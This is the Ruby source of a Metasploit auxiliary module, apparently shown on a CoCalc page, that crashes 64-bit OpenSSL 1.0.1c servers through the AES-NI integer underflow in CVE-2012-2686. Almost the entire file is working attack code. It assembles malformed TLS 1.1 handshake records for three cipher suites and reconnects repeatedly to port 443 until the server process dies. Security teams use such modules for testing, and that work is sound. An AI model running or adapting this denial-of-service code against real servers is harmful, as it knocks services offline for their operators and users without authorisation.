CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
# auxiliary/dos/ssl/openssl_aesni
7
class MetasploitModule < Msf::Auxiliary
8
  include Msf::Exploit::Remote::Tcp
9
  include Msf::Auxiliary::Dos
10

11
  def initialize(info = {})
12
    super(update_info(info,
13
      'Name'		=> 'OpenSSL TLS 1.1 and 1.2 AES-NI DoS',
14
      'Description'	=> %q{
15
          The AES-NI implementation of OpenSSL 1.0.1c does not properly compute the
16
        length of an encrypted message when used with a TLS version 1.1 or above. This
17
        leads to an integer underflow which can cause a DoS. The vulnerable function
18
        aesni_cbc_hmac_sha1_cipher is only included in the 64-bit versions of OpenSSL.
19
        This module has been tested successfully on Ubuntu 12.04 (64-bit) with the default
20
        OpenSSL 1.0.1c package.
21
      },
22
      'Author'	=>
23
        [
24
          'Wolfgang Ettlinger <wolfgang.ettlinger[at]gmail.com>'
25
        ],
26
      'License'		=> MSF_LICENSE,
27
      'References'	=>
28
        [
29
          [ 'CVE', '2012-2686'],
30
          [ 'URL', 'https://www.openssl.org/news/secadv/20130205.txt' ]
31
        ],
32
      'DisclosureDate' => '2013-02-05'))
33

34
    register_options(
35
      [
36
        Opt::RPORT(443),
37
        OptInt.new('MAX_TRIES', [true,  "Maximum number of tries", 300])
38
      ])
39
  end
40

41
  def run
42
    # Client Hello
43
    p1 =  "\x16"				# Content Type: Handshake
44
    p1 << "\x03\x01"				# Version: TLS 1.0
45
    p1 << "\x00\x7e"				# Length: 126
46
    p1 << "\x01"				# Handshake Type: Client Hello
47
    p1 << "\x00\x00\x7a"			# Length: 122
48
    p1 << "\x03\x02"				# Version: TLS 1.1
49
    p1 << ("A" * 32)				# Random
50
    p1 << "\x00"				# Session ID Length: 0
51
    p1 << "\x00\x08"				# Cypher Suites Length: 6
52
    p1 << "\xc0\x13"				# - ECDHE-RSA-AES128-SHA
53
    p1 << "\x00\x39"				# - DHE-RSA-AES256-SHA
54
    p1 << "\x00\x35"				# - AES256-SHA
55
    p1 << "\x00\xff"				# - EMPTY_RENEGOTIATION_INFO_SCSV
56
    p1 << "\x01"				# Compression Methods Length: 1
57
    p1 << "\x00"				# - NULL-Compression
58
    p1 << "\x00\x49"				# Extensions Length: 73
59
    p1 << "\x00\x0b"				# - Extension: ec_point_formats
60
    p1 << "\x00\x04"				#   Length: 4
61
    p1 << "\x03"				#   EC Points Format Length: 3
62
    p1 << "\x00"				#   - uncompressed
63
    p1 << "\x01"				#   - ansiX962_compressed_prime
64
    p1 << "\x02"				#   - ansiX962_compressed_char2
65
    p1 << "\x00\x0a"				# - Extension: elliptic_curves
66
    p1 << "\x00\x34"				#   Length: 52
67
    p1 << "\x00\x32"				#   Elliptic Curves Length: 50
68
    # 25 Elliptic curves:
69
    p1 << "\x00\x0e\x00\x0d\x00\x19\x00\x0b\x00\x0c\x00\x18\x00\x09\x00\x0a"
70
    p1 << "\x00\x16\x00\x17\x00\x08\x00\x06\x00\x07\x00\x14\x00\x15\x00\x04"
71
    p1 << "\x00\x05\x00\x12\x00\x13\x00\x01\x00\x02\x00\x03\x00\x0f\x00\x10"
72
    p1 << "\x00\x11"
73

74
    p1 << "\x00\x23"				# - Extension: SessionTicket TLS
75
    p1 << "\x00\x00"				#   Length: 0
76
    p1 << "\x00\x0f"				# - Extension: Heartbeat
77
    p1 << "\x00\x01"				#   Length: 1
78
    p1 << "\x01"				#   Peer allowed to send requests
79

80

81
    # Change Cipher Spec Message
82
    p2_cssm =  "\x14"				# Content Type: Change Cipher Spec
83
    p2_cssm << "\x03\x02"			# Version: TLS 1.1
84
    p2_cssm << "\x00\x01"			# Length: 1
85
    p2_cssm << "\x01"				# Change Cipher Spec Message
86

87

88
    # Encrypted Handshake Message
89
    p2_ehm =  "\x16"				# Content Type: Handshake
90
    p2_ehm << "\x03\x02"			# Version: TLS 1.1
91
    p2_ehm << "\x00\x40"			# Length: 64
92
    p2_ehm << ("A" * 64)			# Encrypted Message
93

94

95
    # Client Key Exchange, Change Cipher Spec, Encrypted Handshake
96
    # AES256-SHA
97
    p2_aes_sha =  "\x16"			# Content Type: Handshake
98
    p2_aes_sha << "\x03\x02"			# Version: TLS 1.1
99
    p2_aes_sha << "\x01\x06"			# Length: 262
100
    p2_aes_sha << "\x10"			# Handshake Type: Client Key Exchange
101
    p2_aes_sha << "\x00\x01\x02"		# Length: 258
102
    p2_aes_sha << "\x01\x00"			# Encrypted PreMaster Length: 256
103
    p2_aes_sha << ("\x00" * 256)		# Encrypted PresMaster (irrelevant)
104
    p2_aes_sha << p2_cssm 			# Change Cipher Spec Message
105
    p2_aes_sha << p2_ehm			# Encrypted Handshake Message
106

107

108
    # DHE-RSA-AES256-SHA
109
    p2_dhe =  "\x16"				# Content Type: Handshake
110
    p2_dhe << "\x03\x02"			# Version: TLS 1.1
111
    p2_dhe << "\x00\x46"			# Length: 70
112
    p2_dhe << "\x10"				# Handshake Type: Client Key Exchange
113
    p2_dhe << "\x00\x00\x42"			# Length: 66
114
    p2_dhe << "\x00\x40"			# DH Pubkey Length: 64
115
    p2_dhe << ("A" * 64)			# DH Pubkey
116
    p2_dhe << p2_cssm				# Change Cipher Spec Message
117
    p2_dhe << p2_ehm				# Encrypted Handshake Message
118

119

120
    # ECDHE-RSA-AES128-SHA
121
    p2_ecdhe =  "\x16"				# Content Type: Handshake
122
    p2_ecdhe << "\x03\x02"			# Version: TLS 1.1
123
    p2_ecdhe << "\x00\x46"			# Length: 70
124
    p2_ecdhe << "\x10"				# Handshake Type: Client Key Exchange
125
    p2_ecdhe << "\x00\x00\x42"			# Length: 66
126
    p2_ecdhe << "\x41"				# EC DH Pubkey Length: 65
127
    # EC DH Pubkey:
128
    p2_ecdhe << "\x04\x2f\x22\xf4\x06\x3f\xa1\xf7\x3d\xb6\x55\xbc\x68\x65\x57\xd8"
129
    p2_ecdhe << "\x03\xe5\xaa\x36\xeb\x0f\x52\x5a\xaf\xd0\x9f\xf8\xc7\xfe\x09\x69"
130
    p2_ecdhe << "\x5b\x38\x95\x58\xb6\x0d\x27\x53\xe9\x63\xcb\x96\xb3\x54\x47\xa6"
131
    p2_ecdhe << "\xb2\xe6\x8b\x2a\xd9\x03\xb4\x85\x46\xd9\x1c\x5f\xd1\xf7\x7b\x73"
132
    p2_ecdhe << "\x40"
133
    p2_ecdhe << p2_cssm				# Change Cipher Spec Message
134
    p2_ecdhe << p2_ehm				# Encrypted Handshake Message
135

136

137
    maxtries = datastore['MAX_TRIES']
138

139
    success = false
140

141
    for i in 0..maxtries
142
      print_status("Try \##{i}")
143

144
      connect
145

146
      sock.put(p1)
147
      resp = sock.get_once
148

149
      cs = get_cipher_suite(resp)
150

151
      if cs == 0xc013 # ECDHE-RSA-AES128-SHA
152
        p2 = p2_ecdhe
153
      elsif cs == 0x0039 # DHE-RSA-AES256-SHA
154
        p2 = p2_dhe
155
      elsif cs == 0x0035 # AES256-SHA
156
        p2 = p2_aes_sha
157
      else
158
        print_error("No common ciphers!")
159
        return
160
      end
161

162
      sock.put(p2)
163

164
      alert = nil
165

166
      begin
167
        alert = sock.get_once(-1, 2)
168
      rescue EOFError
169
        print_good("DoS successful. process on #{rhost} did not respond.")
170
        success = true
171
        break
172
      end
173

174
      disconnect
175

176
    end
177

178
    if success == false
179
      print_error("DoS unsuccessful.")
180
    end
181
  end
182

183
  def get_cipher_suite(resp)
184
    offset = 0
185

186
    while offset < resp.length
187
      type = (resp[offset, 1]).unpack("C")[0]
188

189
      if not type == 22 # Handshake
190
        return nil
191
      end
192

193
      len = (resp[offset+3, 2]).unpack("n")[0]
194
      hstype = (resp[offset+5, 1]).unpack("C")[0]
195

196
      if hstype == 2 # Server Hello
197
        return (resp[offset+44, 2]).unpack("n")[0]
198
      end
199

200
      offset += len
201
    end
202

203
  end
204
end
205

206

207